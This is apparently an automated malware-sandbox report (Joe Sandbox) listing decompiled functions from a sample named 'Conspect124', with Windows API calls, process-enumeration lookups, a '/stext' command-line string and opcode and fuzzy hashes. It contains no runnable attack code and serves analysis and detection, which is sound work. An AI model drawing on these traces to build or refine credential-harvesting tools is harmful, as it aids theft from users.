                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: freemallocmemcpy
                                      • String ID:
                                      • API String ID: 3056473165-0
                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      • Opcode ID: 2ea43a84bbc6b9850be7b521930e14c731786dace660299f5d5fb6de9ff2c6ec
                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                      • Opcode Fuzzy Hash: 2ea43a84bbc6b9850be7b521930e14c731786dace660299f5d5fb6de9ff2c6ec
                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: BINARY
                                      • API String ID: 2221118986-907554435
                                      • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                      • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /stext
                                      • API String ID: 2081463915-3817206916
                                      • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                      • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 2445788494-0
                                      • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                      • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                      APIs
                                      Strings
                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: failed to allocate %u bytes of memory
                                      • API String ID: 2803490479-1168259600
                                      • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                      • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                      • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                      • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                      APIs
                                      • memset.MSVCRT ref: 0041BDDF
                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcmpmemset
                                      • String ID:
                                      • API String ID: 1065087418-0
                                      • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                      • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                      • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                      • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                        • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                        • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                      • String ID:
                                      • API String ID: 1381354015-0
                                      • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                      • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                      APIs
                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                      • String ID:
                                      • API String ID: 2154303073-0
                                      • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                      • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                      APIs
                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 3150196962-0
                                      • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                      • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$PointerRead
                                      • String ID:
                                      • API String ID: 3154509469-0
                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                      APIs
                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                      • String ID:
                                      • API String ID: 4232544981-0
                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                      APIs
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$FileModuleName
                                      • String ID:
                                      • API String ID: 3859505661-0
                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                      APIs
                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                      • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                      APIs
                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
